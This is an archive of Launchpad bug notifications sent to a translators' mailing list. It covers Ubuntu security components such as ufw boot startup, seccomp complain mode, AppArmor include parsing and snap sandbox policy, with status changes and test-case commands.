https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
Wrt:
the network-pre.target has this purpose:
"It's primary purpose is for usage with firewall services that want to
establish a firewall before any network interface is up"
I'm not sure network-pre.target existed at the time ufw added a systemd
unit, but regardless, this sounds like exactly what we should be doing.
Thanks for the triage!
** Changed in: ufw (Ubuntu)
Status: New => Triaged
** Changed in: ufw (Ubuntu)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
** Also affects: ufw (Ubuntu Bionic)
Importance: Undecided
Status: New
** Also affects: ufw (Ubuntu Cosmic)
Importance: Undecided
Assignee: Jamie Strandboge (jdstrand)
Status: Triaged
** Also affects: ufw (Ubuntu Xenial)
Importance: Undecided
Status: New
** Also affects: ufw (Ubuntu Artful)
Importance: Undecided
Status: New
** Changed in: ufw (Ubuntu Xenial)
Status: New => Triaged
** Changed in: ufw (Ubuntu Artful)
Status: New => Triaged
** Changed in: ufw (Ubuntu Bionic)
Status: New => Triaged
** Also affects: ufw
Importance: Undecided
Status: New
** Changed in: ufw
Status: New => Triaged
** Changed in: ufw
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
** Changed in: ufw (Ubuntu Xenial)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
** Changed in: ufw (Ubuntu Artful)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
** Changed in: ufw (Ubuntu Bionic)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1726856
Title:
ufw does not start automatically at boot
Status in ufw:
Triaged
Status in ufw package in Ubuntu:
Triaged
Status in ufw source package in Xenial:
Triaged
Status in ufw source package in Artful:
Triaged
Status in ufw source package in Bionic:
Triaged
Status in ufw source package in Cosmic:
Triaged
Bug description:
Whenever I boot into 17.10 ufw is always inactive, even though
/etc/ufw/ufw.conf has this:
# Set to yes to start on boot. If setting this remotely, be sure to add a rule
# to allow your remote connection before starting ufw. Eg: 'ufw allow 22/tcp'
ENABLED=yes
ProblemType: Bug
DistroRelease: Ubuntu 17.10
Package: ufw 0.35-5
ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4
Uname: Linux 4.13.0-16-generic x86_64
ApportVersion: 2.20.7-0ubuntu3
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Tue Oct 24 13:56:40 2017
InstallationDate: Installed on 2015-04-01 (936 days ago)
InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64
(20140722.2)
PackageArchitecture: all
SourcePackage: ufw
UpgradeStatus: Upgraded to artful on 2017-10-24 (0 days ago)
mtime.conffile..etc.default.ufw: 2015-06-17T22:01:02.089170
To manage notifications about this bug go to:
https://bugs.launchpad.net/ufw/+bug/1726856/+subscriptions
___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1567597] Re: implement 'complain mode' in seccomp for developer mode with snaps
This is fixed in xenial 2.3.1-2.1ubuntu2~16.04.1 ** Changed in: libseccomp (Ubuntu Xenial) Status: In Progress => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1567597 Title: implement 'complain mode' in seccomp for developer mode with snaps Status in Snappy: In Progress Status in libseccomp package in Ubuntu: Fix Released Status in linux package in Ubuntu: Fix Released Status in libseccomp source package in Xenial: Fix Released Status in linux source package in Xenial: Fix Released Status in libseccomp source package in Zesty: Fix Released Status in linux source package in Zesty: Fix Released Bug description: A requirement for snappy is that a snap may be placed in developer mode which will put the security sandbox in complain mode such that violations against policy are logged, but permitted. In this manner learning tools can be written to parse the logs, etc and make developing on snappy easier. Unfortunately with seccomp only SCMP_ACT_KILL logs to dmesg and while we can set complain mode to permit all calls, they are not logged at this time. I've discussed this with upstream and we are working together on the approach. This may require a kernel patch and an update to libseccomp, to filing this bug for now as a placeholder and we'll add other tasks as necessary. UPDATE: ubuntu-core-launcher now supports the '@complain' directive that is a synonym for '@unrestricted' so people can at least turn on developer mode and not be blocked by seccomp. Proper complain mode for seccomp needs to still be implemented (this bug). [Impact] Snapd needs a way to log seccomp actions without blocking any syscalls in order to have a more useful complain mode. Such functionality has been acked upstream and patches are on their way into the Linux 4.14 kernel (backported to 4.12.0-13.14 in artful). The corresponding libseccomp changes are still undergoing review (https://github.com/seccomp/libseccomp/pull/92). The pull request adds a number of new symbols and probably isn't appropriate to backport until upstream has acked the pull request. However, only a small part of that larger pull request is needed by snapd and that change can be safely backported since the only added symbol, the SCMP_ACT_LOG macro, must match the SECCOMP_RET_LOG macro that has already been approved and merged in the upstream Linux kernel. [libseccomp Test Case] A large number of tests are ran as part of the libseccomp build. However, the "live" tests which test libseccomp with actual kernel enforcement are not ran at that time. They can be manually exercised to help catch any regressions. Note that on Artful, there's an existing test failure (20-live-basic_die%%002-1): $ sudo apt build-dep -y libseccomp $ sudo apt install -y cython $ apt source libseccomp $ cd libseccomp-* $ autoreconf -ivf && ./configure --enable-python && make check-build $ (cd tests && ./regression -T live) All tests should pass on zesty (12 tests) and xenial (10 tests). On artful, you'll see one pre-existing failure: ... Test 20-live-basic_die%%002-1 result: FAILURE 20-live-basic_die TRAP rc=159 ... Regression Test Summary tests run: 12 tests skipped: 0 tests passed: 11 tests failed: 1 tests errored: 0 Now we can build and run a small test program to test the SCMP_ACT_LOG action in the way that snapd wants to use it for developer mode: $ sudo apt install -y libseccomp-dev $ gcc -o lp1567597-test lp1567597-test.c -lseccomp $ ./lp1567597-test With a kernel that contains the logging patches and an updated libseccomp, the exit code should be 0 and you should have an entry in the system log that looks like this: audit: type=1326 audit(1505859630.994:69): auid=1000 uid=1000 gid=1000 ses=2 pid=18451 comm="lp1567597-test" exe="/home/tyhicks/lp1567597-test" sig=0 arch=c03e syscall=2 compat=0 ip=0x7f547352c5c0 code=0x7ffc If you have an updated libseccomp with an old kernel, you'll see that seccomp_init() fails due to the added compatibility check inside of libseccomp determines that the kernel doesn't have proper support for the new log action: $ ./lp1567597-test ERROR: seccomp_init: Invalid argument [Linux Kernel Test Case] All of the libseccomp test cases apply here. Running the seccomp kernel selftests is also a great to exercise seccomp and the kernel patch set proposed for the SRU includes additional seccomp selftests. To build, enter into the root of the kernel source tree and build the seccomp test binary: $ make -C tools/testing/selftests TARGETS=seccomp Now you can execut
[Group.of.nepali.translators] [Bug 1746463] Re: apparmor profile load in stacked policy container fails
Since this is going to be fixed in 'linux' and 'linux-gcp', adding tasks
for those.
** Changed in: apparmor (Ubuntu Artful)
Status: Won't Fix => Fix Committed
** Changed in: linux (Ubuntu Artful)
Status: Fix Committed => Confirmed
** Also affects: linux-gcp (Ubuntu)
Importance: Undecided
Status: New
** Also affects: apparmor (Ubuntu Xenial)
Importance: Undecided
Status: New
** Also affects: linux (Ubuntu Xenial)
Importance: Undecided
Status: New
** Also affects: linux-gcp (Ubuntu Xenial)
Importance: Undecided
Status: New
** Changed in: apparmor (Ubuntu Xenial)
Status: New => Won't Fix
** Changed in: linux (Ubuntu Xenial)
Status: New => Invalid
** Changed in: linux-gcp (Ubuntu Artful)
Status: New => Invalid
** Changed in: linux-gcp (Ubuntu Bionic)
Status: New => Invalid
** Changed in: linux-gcp (Ubuntu Xenial)
Status: New => Confirmed
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1746463
Title:
apparmor profile load in stacked policy container fails
Status in snapd:
Triaged
Status in apparmor package in Ubuntu:
Confirmed
Status in linux package in Ubuntu:
Confirmed
Status in linux-gcp package in Ubuntu:
Invalid
Status in apparmor source package in Xenial:
Won't Fix
Status in linux source package in Xenial:
Invalid
Status in linux-gcp source package in Xenial:
Confirmed
Status in apparmor source package in Artful:
Fix Committed
Status in linux source package in Artful:
Confirmed
Status in linux-gcp source package in Artful:
Invalid
Status in apparmor source package in Bionic:
Confirmed
Status in linux source package in Bionic:
Confirmed
Status in linux-gcp source package in Bionic:
Invalid
Bug description:
LXD containers on an artful or bionic host with aa namespaces, should
be able to load the lxc policies. However /lib/apparmor/profile-load
skips that part when running in a container.
aa-status shows 0 policies
/lib/apparmor/profile-load is failing due to
is_container_with_internal_policy() failing
due to
/sys/kernel/security/apparmor/.ns_name being empty which causes
if [ "${ns_name#lxd-*}" = "$ns_name" ] && \
[ "${ns_name#lxc-*}" = "$ns_name" ]; then
return 1
fi
to fail
To manage notifications about this bug go to:
https://bugs.launchpad.net/snapd/+bug/1746463/+subscriptions
___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1733700] Re: python tools do not understand 'non-magic' include rules
Due to the builder being down for meltdown/spectre, the patches for this
were delayed. However, the 3rd core snap without the issue (2.29.4.2,
2.30 and the upcoming 2.31.1) that caused this problem is about to be
released meaning the affected core snap revision is about to be reaped
which will resolve this bug for those users. As a result, marking all
stable releases of Ubuntu as Won't Fix. Bionic will be fixed with the
upcoming 2.12 merge from Debian.
** Changed in: apparmor (Ubuntu Zesty)
Status: Triaged => Won't Fix
** Changed in: apparmor (Ubuntu Trusty)
Status: In Progress => Won't Fix
** Changed in: apparmor (Ubuntu Xenial)
Status: In Progress => Won't Fix
** Changed in: apparmor (Ubuntu Artful)
Status: In Progress => Won't Fix
** Changed in: apparmor (Ubuntu Bionic)
Status: In Progress => Triaged
** Changed in: apparmor (Ubuntu Bionic)
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1733700
Title:
python tools do not understand 'non-magic' include rules
Status in AppArmor:
Fix Released
Status in apparmor package in Ubuntu:
Triaged
Status in apparmor source package in Trusty:
Won't Fix
Status in apparmor source package in Xenial:
Won't Fix
Status in apparmor source package in Zesty:
Won't Fix
Status in apparmor source package in Artful:
Won't Fix
Status in apparmor source package in Bionic:
Triaged
Bug description:
The apparmor parser supports 'include' and '#include' rules for
specifying absolute paths, but the python tools only understand
include rules for so called 'magic' '<>' file locations.
= test case #0 (testsuite) =
$ sudo apt-get install apparmor apparmor-utils # from proposed
$ sudo apt-get build-dep apparmor
$ sudo apt-get install quilt realpath pyflakes pyflakes3 # pyflakes3 on
xenial and higher
$ apt-get source apparmor # from proposed
$ cd apparmor-*
$ quilt push -a
$ export PYTHONPATH=$(realpath libraries/libapparmor/swig/python)
$ export PYTHON=/usr/bin/python3
$ export PYTHON_VERSION=3
$ export PYTHON_VERSIONS=python3
$ cd libraries/libapparmor
$ sh ./autogen.sh
$ sh ./configure --prefix=/usr --with-perl --with-python
$ make
$ cd ../../binutils
$ make
$ ../parser
$ make
$ cd ../utils
$ make
$ make check
= test case #1 (aa-enforce) =
This assumes test case #0 has been performed.
$ mkdir /tmp/test1 /tmp/test2
$ cat /etc/apparmor.d/lp1733700
profile lp1733700 {
#include "/tmp/test1"
include "/tmp/test2"
}
$ apparmor_parser -QTK /etc/apparmor.d/lp1733700 && echo ok
$ sudo aa-enforce /etc/apparmor.d/lp1733700 # currently fails
= test case #2 (aa-genprof) =
This assumes test case #1 was already performed and
/etc/apparmor.d/lp1733700 exists with the above includes.
$ cat /tmp/lp1733700
#!/bin/sh
set -e
sh -c "$@"
$ chmod 755 /tmp/lp1733700
# run without confinement:
$ /tmp/lp1733700 'cat /etc/fstab' | head -1
# /etc/fstab: static file system information.
# invoke genprof
$ sudo aa-genprof /tmp/lp1733700
...
[(S)can system log for AppArmor events] / (F)inish - PRESS 's' - currently
fails
... don't exercise the application any so we just have the default profile ...
[(S)can system log for AppArmor events] / (F)inish - PRESS 'f'
...
Finished generating profile for /tmp/lp1733700.
$ sudo cat /etc/apparmor.d/tmp.lp1733700
# Last Modified: Wed Dec 20 15:53:07 2017
#include
/tmp/lp1733700 {
#include
#include
/bin/dash ix,
/lib/x86_64-linux-gnu/ld-*.so mr,
/tmp/lp1733700 r,
}
= test case #3 (aa-logprof) =
This assumes test case #1 was already performed and
/etc/apparmor.d/lp1733700 exists with the above includes.
This also assumes test case #2 was already performed and
/etc/apparmor.d/tmp.lp1733700 exists.
Disable kernel rate limiting:
$ sudo sysctl -w kernel.printk_ratelimit=0
Create mark entry in syslog:
$ logger mark-lp1733700
Try running logprof with no new denials:
$ sudo aa-logprof -m mark-lp1733700 # currently fails
Reading log entries from /var/log/syslog.
Updating AppArmor profiles in /etc/apparmor.d.
$
Adjust /etc/apparmor.d/tmp.lp1733700 to add:
#include "/tmp/test1"
include "/tmp/test2"
Load it into the kernel:
$ sudo apparmor_parser -r /etc/apparmor.d/tmp.lp1733700
Create a new denial:
$ /tmp/lp1733700 'uptime'
sh: 1: uptime: Permission denied
$
Try running logprof:
$ sudo aa-logprof -m mark-lp1733700 # currently fails
Reading log entries from /var/log/syslog.
[Group.of.nepali.translators] [Bug 1734038] Re: snap-confine profile uses 'include' instead of '#include' which breaks apparmor-utils python tools
2.29.4 debs and 16-2.30 core snaps use: #include "/var/lib/snapd/apparmor/snap-confine.d" This is sufficient to mark this bug Fix Released for snapd. For systems that are affected by this bug with older revisions of the core snap, please see the workaround in https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1734038/comments/15 and follow the progress in the apparmor bug: https://bugs.launchpad.net/bugs/1733700 ** Changed in: snapd (Ubuntu Trusty) Status: New => Fix Released ** Changed in: snapd (Ubuntu Zesty) Status: Invalid => Fix Released ** Changed in: snapd (Ubuntu Artful) Status: New => Fix Released ** Changed in: snapd (Ubuntu Bionic) Status: In Progress => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1734038 Title: snap-confine profile uses 'include' instead of '#include' which breaks apparmor-utils python tools Status in snapd package in Ubuntu: Fix Released Status in snapd source package in Trusty: Fix Released Status in snapd source package in Xenial: Fix Released Status in snapd source package in Zesty: Fix Released Status in snapd source package in Artful: Fix Released Status in snapd source package in Bionic: Fix Released Bug description: Issue found with Xenial kernel 4.4.0-102 and Zesty kernel 4.10.0-41, across different architectures Multiple tests from ubuntu_qrt_apparmor test suite failed with the same error message: ERROR: Syntax Error: Unknown line found in file /etc/apparmor.d/usr.lib.snapd.snap-confine.real line 15: include "/var/lib/snapd/apparmor/snap-confine.d" /etc/ld.so.cache r, (BTW the include and this ld.so.cache are not in the same line, please refer to comment #3 for attachment) This issue will gone if you downgrade the snapd and ubuntu-core-launcher package: sudo apt-get install snapd=2.28.5 ubuntu-core-launcher=2.28.5 Debug information: ubuntu@kernel01:~$ snap version snap2.29.3 snapd 2.29.3 series 16 ubuntu 16.04 kernel 4.4.0-102-generic ubuntu@kernel01:~$ apt list snapd Listing... Done snapd/xenial-proposed,now 2.29.3 s390x [installed] N: There are 2 additional versions. Please use the '-a' switch to see them. ubuntu@kernel01:~$ apt list apparmor -a Listing... Done apparmor/xenial-updates,now 2.10.95-0ubuntu2.7 s390x [installed] apparmor/xenial-security 2.10.95-0ubuntu2.6 s390x apparmor/xenial 2.10.95-0ubuntu2 s390x Steps to run the Apparmor test from QA Regression testing suite: 1. git clone --depth 1 https://git.launchpad.net/qa-regression-testing 2. sudo ./qa-regression-testing/scripts/test-apparmor.py ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: linux-image-4.4.0-102-generic 4.4.0-102.125 ProcVersionSignature: Ubuntu 4.4.0-102.125-generic 4.4.98 Uname: Linux 4.4.0-102-generic s390x NonfreeKernelModules: zfs zunicode zcommon znvpair zavl AlsaDevices: Error: command ['ls', '-l', '/dev/snd/'] failed with exit code 2: ls: cannot access '/dev/snd/': No such file or directory AplayDevices: Error: [Errno 2] No such file or directory: 'aplay' ApportVersion: 2.20.1-0ubuntu2.13 Architecture: s390x ArecordDevices: Error: [Errno 2] No such file or directory: 'arecord' CRDA: Error: command ['iw', 'reg', 'get'] failed with exit code 1: nl80211 not found. CurrentDmesg: Date: Thu Nov 23 01:36:31 2017 IwConfig: Error: [Errno 2] No such file or directory: 'iwconfig' Lspci: Lsusb: Error: command ['lsusb'] failed with exit code 1: PciMultimedia: ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=C SHELL=/bin/bash ProcFB: Error: [Errno 2] No such file or directory: '/proc/fb' ProcKernelCmdLine: root=UUID=44b0b919-a1a4-4849-9425-e71d4ac87d85 crashkernel=196M BOOT_IMAGE=0 RelatedPackageVersions: linux-restricted-modules-4.4.0-102-generic N/A linux-backports-modules-4.4.0-102-generic N/A linux-firmware 1.157.13 RfKill: Error: [Errno 2] No such file or directory: 'rfkill' SourcePackage: linux UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1734038/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1733700] Re: python tools do not understand 'non-magic' include rules
The was fixed upstream in 2.12.
** Changed in: apparmor
Status: In Progress => Fix Released
** Changed in: apparmor (Ubuntu Bionic)
Status: Triaged => In Progress
** Changed in: apparmor (Ubuntu Bionic)
Assignee: (unassigned) => Jamie Strandboge (jdstrand)
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1733700
Title:
python tools do not understand 'non-magic' include rules
Status in AppArmor:
Fix Released
Status in apparmor package in Ubuntu:
In Progress
Status in apparmor source package in Trusty:
Triaged
Status in apparmor source package in Xenial:
Triaged
Status in apparmor source package in Zesty:
Triaged
Status in apparmor source package in Artful:
Triaged
Status in apparmor source package in Bionic:
In Progress
Bug description:
The apparmor parser supports 'include' and '#include' rules for
specifying absolute paths, but the python tools only understand
include rules for so called 'magic' '<>' file locations.
= test case #1 (aa-enforce) =
$ mkdir /tmp/test1 /tmp/test2
$ cat /etc/apparmor.d/lp1733700
profile lp1733700 {
#include "/tmp/test1"
include "/tmp/test2"
}
$ apparmor_parser -QTK /etc/apparmor.d/lp1733700 && echo ok
$ sudo aa-enforce /etc/apparmor.d/lp1733700 # currently fails
= test case #2 (aa-genprof) =
This assumes test case #1 was already performed and
/etc/apparmor.d/lp1733700 exists with the above includes.
$ cat /tmp/lp1733700
#!/bin/sh
set -e
sh -c "$@"
# run without confinement:
$ /tmp/lp1733700 'cat /etc/fstab' | head -1
# /etc/fstab: static file system information.
# invoke genprof
$ sudo aa-genprof /tmp/lp1733700
...
[(S)can system log for AppArmor events] / (F)inish - PRESS 's' - currently
fails
... don't exercise the application any so we just have the default profile ...
[(S)can system log for AppArmor events] / (F)inish - PRESS 'f'
...
Finished generating profile for /tmp/lp1733700.
$ sudo cat /etc/apparmor.d/tmp.lp1733700
# Last Modified: Wed Dec 20 15:53:07 2017
#include
/tmp/lp1733700 {
#include
#include
/bin/dash ix,
/lib/x86_64-linux-gnu/ld-*.so mr,
/tmp/lp1733700 r,
}
= test case #3 (aa-logprof) =
This assumes test case #1 was already performed and
/etc/apparmor.d/lp1733700 exists with the above includes.
This also assumes test case #2 was already performed and
/etc/apparmor.d/tmp.lp1733700 exists.
Disable kernel rate limiting:
$ sudo sysctl -w kernel.printk_ratelimit=0
Create mark entry in syslog:
$ logger mark-lp1733700
Try running logprof with no new denials:
$ sudo aa-logprof -m mark-lp1733700 # currently fails
Reading log entries from /var/log/syslog.
Updating AppArmor profiles in /etc/apparmor.d.
$
Adjust /etc/apparmor.d/tmp.lp1733700 to add:
#include "/tmp/test1"
include "/tmp/test2"
Load it into the kernel:
$ sudo apparmor_parser -r /etc/apparmor.d/tmp.lp1733700
Create a new denial:
$ /tmp/lp1733700 'uptime'
sh: 1: uptime: Permission denied
$
Try running logprof:
$ sudo aa-logprof -m mark-lp1733700 # currently fails
Reading log entries from /var/log/syslog.
Updating AppArmor profiles in /etc/apparmor.d.
Profile: /tmp/lp1733700
Execute: /usr/bin/uptime
Severity: unknown
(I)nherit / (C)hild / (N)amed / (X) ix On / (D)eny / Abo(r)t / (F)inish
...
The following local profiles were changed. Would you like to save them?
[1 - /tmp/lp1733700]
(S)ave Changes / Save Selec(t)ed Profile / [(V)iew Changes] / View Changes
b/w (C)lean profiles / Abo(r)t
Writing updated profile for /tmp/lp1733700.
$
Verify the profile for 'uptime' addition and that the /tmp/test1 and
/tmp/test2 includes were not removed (it is ok that they are both
'#include'):
$ sudo cat /etc/apparmor.d/tmp.lp1733700
# Last Modified: Wed Dec 20 16:19:19 2017
#include
/tmp/lp1733700 {
#include "/tmp/test1"
#include "/tmp/test2"
#include
#include
/bin/dash ix,
/lib/x86_64-linux-gnu/ld-*.so mr,
/tmp/lp1733700 r,
/usr/bin/uptime mrix,
}
= test case #4 (aa-mergeprof) =
$ mkdir -p /tmp/aa-mergeprof/new
$ mkdir /tmp/aa-mergeprof/new/tunables /tmp/aa-mergeprof/new/abstractions
$ touch /tmp/aa-mergeprof/new/tunables/global
/tmp/aa-mergeprof/new/abstractions/base /tmp/aa-mergeprof/new/abstractions/bash
$ cp -a /tmp/aa-mergeprof/new /tmp/aa-mergeprof/old
$ cat /tmp/aa-mergeprof/old/tmp.lp1733700 # no test2 include or cat
#include
/tmp/lp1733700 {
#include
#include
#include "/tmp/test1"
/bin/
[Group.of.nepali.translators] [Bug 1583057] Re: Deny audio recording for all snap applications
** Changed in: pulseaudio (Ubuntu Xenial) Status: In Progress => Won't Fix -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1583057 Title: Deny audio recording for all snap applications Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Won't Fix Status in pulseaudio source package in Yakkety: Fix Released Bug description: [Impact] Currently snaps on Ubuntu Classic may declare in their snap.yaml that they want access to pulseaudio. When installed, snapd will auto-connect the pulseaudio interface giving the snap access to the pulseaudio server for playback and recording. Because recording is allowed, snaps are allowed to eavesdrop on users without the user knowing. Phase 1 of the pulseaudio interface should block recording for snaps while the details of phase 2 (which combines pulseaudio/snappy interfaces and trust-store) are worked out. [Test Case] First, install pulseaudio then reboot (alternatively can 'killall pulseaudio' from within your session or logout then killall pulseaudio from a vt and then log back in). pulseaudio needs to be restarted for the changes to be in effect and a reboot is the easiest way to achieve that. 1. unconfined can play audio 2. unconfined can record audio 3. non-snap confined can play audio 4. non-snap confined can record audio 5. snap confined can play audio 6. snap confined cannot record audio 7. snap confined devmode can record audio 8. indicator-sound and 'Sound Settings... works' 9. click can record audio if trust-store allows (eg, 'SnapRecorder' from the store) 10. click can play audio (eg, playback of recording from 'SnapRecorder' from the store) Currently '6' is not implemented and all snaps may record audio. When this bug is fixed, no snaps should be able to record audio (until phase 2 is implemented which will be in a different bug). The attached script tests 1-7. 9 and 10 require testing on a device and using [Regression Potential] The patch is quite small and easy to understand and is implemented to only affect processes that want to record and are running with a security label that starts with 'snap.' Unconfined processes and process running under other security labels should not be affected. Original description: Until we have a proper trust-store implementation with snappy and on the desktop/ubuntu core we want pulseaudio to simply deny any audio recording request coming from an app shipped as part of a snap. The implementation adds a module-snappy-policy module to pulseaudio which adds a hook for audio recording requests and checks on connection if the apparmor security label of the connecting peer starts with "snap." which will identify it as a snap application. Pulseaudio with the patch is available as part of the landing request at https://requests.ci-train.ubuntu.com/#/ticket/1428 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1583057/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1626359] Re: Cannot authorise quotactl syscall for Q_GETQUOTA
** Changed in: snapd (Ubuntu) Status: Triaged => Fix Released ** Changed in: snappy Status: In Progress => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1626359 Title: Cannot authorise quotactl syscall for Q_GETQUOTA Status in Snappy: Fix Released Status in snapd package in Ubuntu: Fix Released Status in snapd source package in Trusty: Fix Released Status in snapd source package in Xenial: Fix Released Status in snapd source package in Yakkety: Fix Released Bug description: While debugging a snap I get this security error ``` = Seccomp = Time: Sep 22 03:54:47 Log: auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c03e 179(quotactl) compat=0 ip=0x7fa06ab2d3fa code=0x0 Syscall: quotactl ``` There is no workaround given, so I've added a security override, but it doesn't do anything. ``` transmission-daemon: command: transmission-init start stop-command: transmission-init stop daemon: forking plugs: [network, network-bind, quotactl] ... plugs: quotactl: command: binary security-override: syscalls: [quotactl] ``` There doesn't seem to be a ready-made interface loaded at install time which would include that syscall, so I can't find a solution for that problem. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1626359/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1661265] Re: [regression] sched_setscheduler denied with Qt/QML applications
** Changed in: snappy Status: Fix Committed => Fix Released ** Changed in: canonical-devices-system-image Status: In Progress => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1661265 Title: [regression] sched_setscheduler denied with Qt/QML applications Status in Canonical System Image: Fix Released Status in Snappy: Fix Released Status in snapd package in Ubuntu: Fix Released Status in snapd source package in Trusty: Fix Released Status in snapd source package in Xenial: Fix Released Status in snapd source package in Yakkety: Fix Released Status in snapd source package in Zesty: Fix Released Bug description: 2.22 added stricter mediation of sched_setscheduler which requires use of 'process-control' with certain invocations of sched_setsceduler. Testing and code searches for sched_setscheduler showed that this was not an issue for most applications and existing snaps, but after 2.22 was released it was found that qtbase-opensource-src uses sched_setscheduler indirectly as part of QThread::Priority, and QThread::Priority is used extensively under the hood by the libraries to support (at least) QML applications. The fix is simple, adjust interfaces/seccomp/template.go from this: sched_setscheduler 0 - - back to: sched_setscheduler To manage notifications about this bug go to: https://bugs.launchpad.net/canonical-devices-system-image/+bug/1661265/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1576066] Re: 32bit glibc calls old socketcall() syscall, causing seccomp problems
FYI, >=16.10 has libseccomp >= 2.3. xenial has 2.2.3-3ubuntu3 that includes updated syscall tables for this (https://bugs.debian.org/cgi- bin/bugreport.cgi?bug=809556 and https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1554098). >=16.04 have 4.4 kernels and updated glibc. ** Bug watch added: Debian Bug tracker #809556 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=809556 ** Changed in: libseccomp (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) ** Changed in: libseccomp (Ubuntu) Status: Confirmed => Fix Released ** Changed in: libseccomp (Ubuntu Xenial) Status: New => Fix Released ** Changed in: libseccomp (Ubuntu Trusty) Status: New => Triaged ** Changed in: glibc (Ubuntu Trusty) Status: New => Triaged ** Changed in: glibc (Ubuntu) Status: Confirmed => Fix Released ** Changed in: glibc (Ubuntu Xenial) Status: New => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1576066 Title: 32bit glibc calls old socketcall() syscall, causing seccomp problems Status in glibc package in Ubuntu: Fix Released Status in libseccomp package in Ubuntu: Fix Released Status in glibc source package in Trusty: Triaged Status in libseccomp source package in Trusty: Triaged Status in glibc source package in Xenial: Fix Released Status in libseccomp source package in Xenial: Fix Released Bug description: Back in the day when Linux was created for i386, for who knows what reason, all socket calls were multiplexed through a single syscall API, socketcall(). This was a strange thing to do, but it probably made sense from the standpoint of the same part of the kernel handling all of those calls. It was realised a long time ago that this was a strange and suboptimal arrangement. By the time they got around to doing amd64 and other architectures, they fixed this arrangement and gave each socket call a separate syscall entry point. 32bit systems continued to do it this old way, however, multiplexing all calls through socketcall(). This is a problem for seccomp. If we want to allow a program to make casual use of the network, but not bind a listener socket, we cannot currently do that. On 64bits we just filter out the bind() and listen() calls, but on 32bit, it's all the same syscall. The kernel people fixed this problem up last summer by introducing new, separate, syscall entries for each separate call. 